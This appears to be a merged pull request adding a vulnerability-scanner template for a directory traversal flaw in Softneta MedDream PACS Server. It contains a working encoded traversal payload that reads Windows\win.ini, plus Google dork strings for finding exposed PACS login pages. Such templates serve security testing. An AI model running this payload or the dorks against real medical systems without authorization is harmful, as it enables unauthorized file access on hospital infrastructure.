Merge pull request #3426 from Akokonunes/patch-97

Create sofneta-mecdream-pacs-server-lfi.yaml

vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml

@@ -0,0 +1,27 @@
+id: sofneta-mecdream-pacs-lfi
+
+info:
+  name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
+  author: 0x_akoko
+  severity: high
+  description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
+  reference:
+    - https://www.exploit-db.com/exploits/45347
+    - https://www.softneta.com/products/meddream-pacs-server/downloads.html
+  metadata:
+    google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
+  tags: sofneta,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and